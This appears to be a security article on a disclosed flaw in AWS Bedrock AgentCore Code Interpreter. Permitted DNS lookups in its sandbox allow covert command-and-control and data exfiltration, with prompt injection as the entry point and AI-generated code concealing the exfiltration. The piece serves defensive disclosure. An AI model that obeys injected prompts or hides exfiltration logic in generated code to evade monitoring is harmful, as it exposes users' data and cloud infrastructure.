The Amazon Web Services (AWS) Bedrock AgentCore Code Interpreter is a managed service enabling AI agents to execute Python code dynamically and securely within a managed cloud environment. The service’s sandbox mode was positioned by Amazon as a network-isolated execution layer to prevent external communication. However, the identity and access management (IAM) role assigned to the interpreter gives it broad access to AWS resources, a design choice with severe security implications. BeyondTrust Phantom Labs recently published a report exploring this flaw.
What BeyondTrust Phantom Labs Actually Found
In the course of researching AI code execution environments, Phantom Labs discovered that AWS Bedrock AgentCore Code Interpreter’s sandbox mode did not fully prevent outbound communications. Certain DNS queries—A and AAAA record lookups—are permitted even in sandbox mode, contradicting AWS’s guarantee of an isolated environment.
This flaw creates a fully operational covert channel, where DNS-based command-and-control (C2) can be established without triggering standard network controls. Data exfiltration becomes possible through DNS, a protocol that most security monitoring treats as benign infrastructure traffic. This enables malicious activity to be carried out without alerting security tools.
The Real-World Blast Radius
The discovery of this flaw reveals a significant gap in AWS Bedrock AgentCore Code Interpreter’s security that users and organizations are broadly unaware of. An attacker exploiting this channel could penetrate AWS resources that are reachable via the Code Interpreter's IAM role, allowing widespread access through legitimately authorized channels. This type of action is not immediately recognizable to security tools as malicious, enabling attackers to evade defenses.
With the far-reaching access granted to the Code Interpreter, an attacker can carry out a wide range of actions within the targeted system. Potential outcomes of this access include exfiltration of sensitive customer data, deletion of critical infrastructure, and operational disruptions or service downtime. The gap between the documented behavior of the tool and the actual malicious behavior represents a systemic trust failure in cloud AI security tooling.
Prompt Injection as the Entry Point
The initial access point of an attack taking advantage of this flaw is prompt injection. The discovery of this flaw in the Code Interpreter is one example of a widespread issue with AI tools and agents: their inability to discern legitimate requests from suspicious or malicious activity, and their susceptibility to exploitation via carefully-worded prompts.
Direct prompt injection manipulates the AI agent into executing code containing exfiltration logic, disguised within seemingly legitimate requests. Indirect prompt injection, on the other hand, works by tricking the agent into visiting attacker-controlled web content that feeds malicious payloads into the model's context. Neither method requires privileged access—only the ability to interact with or influence the inputs that the AI agent processes.
Supply Chain Risk Buried in 270+ Dependencies
Compounding with the rising dangers endemic to AI tool and agent usage, supply chain risk is one of the major security issues plaguing organizations in the modern threat landscape. The AWS Bedrock AgentCore Code Interpreter ships with over 270 third-party packages, each representing a potential insertion point for a compromised library.
A malicious package, once imported, could autonomously establish a DNS-based C2 channel without any additional attacker interaction. The scale of the dependency surface makes comprehensive vetting operationally difficult, and supply chain compromises in AI tooling have historically gone undetected for extended periods of time. Sprawling, interconnected supply chains and cloud environments present significant challenges for comprehensive visibility and monitoring.
AI-Generated Code as a Weapon Against Itself
The AI-empowered code generation by the Code Interpreter can enable malicious activity to be carried out while evading detection by traditional security tools. When AI agents generate Python code for legitimate tasks, prompt crafting can cause the model to include exfiltration logic that superficially resembles normal code.
The generated code may pass basic review because it performs the requested function while silently exfiltrating data via DNS. This attack vector is particularly insidious because it exploits the model's core capability, code generation, rather than any external weakness. Thus, there is no way to fully block the ability to exploit this channel without fundamentally impeding legitimate use of the tool.
The Protocol-Level Blind Spot in Cloud Sandboxing
This flaw highlights a significant gap in cloud services security that is not easily fixed. DNS is foundational infrastructure, and blocking it would break too many legitimate functions, so it is routinely excluded from isolation controls. However, this leaves the door open for malicious activity using DNS as a vector. Cloud providers designing AI execution environments are inheriting decades of networking assumptions that were not built with adversarial AI agent behavior in mind. Legacy operational and security tooling has not been designed to handle the types of risks that come with the use of agentic AI.
The flaw discovered by Phantom Labs is, in all likelihood, not unique to AWS: any AI code execution environment relying on OS-level DNS resolution shares a structurally similar exposure.Ram Varadarajan, CEO at Acalvio, a Santa Clara, Calif.-based leader in cyber deception technology, notes that “the lesson isn't that AWS shipped a bug, it's that perimeter controls are architecturally insufficient against agentic AI execution environments.”
The IAM Amplification Problem
This issue highlights a significant and ongoing IAM crisis caused by years of lax identity management and excessive permissions. Operating differently from human users, AI agents endowed with broad IAM permissions transform a narrow technical vulnerability into a high-impact breach vector.
While held as standard in traditional cloud security, the principle of least privilege is frequently not applied rigorously to AI agent roles, granting them far greater access than they require. Unlike people, AI tools and agents work at machine speed and lack the judgment and training necessary to determine when they are taking potentially harmful actions. Security teams require a new mental model where the AI agent’s IAM role is viewed as an attack surface, rather than simply an operational configuration.
What Comes Next for Security Teams and Cloud Providers
This disclosure by BeyondTrust Phantom Labs should be taken to heart by defenders, organizations, and cloud service providers alike. Organizations using AWS Bedrock AgentCore are encouraged to implement DNS monitoring tuned for AI execution environments and scope IAM permissions to the minimum required. Cloud providers like AWS must offer tiered isolation options, including true air-gap modes, and publish version-specific dependency inventories for independent security review. The discovery of this flaw should catalyze a broader audit of DNS handling across all major cloud AI execution services, not just AWS Bedrock.
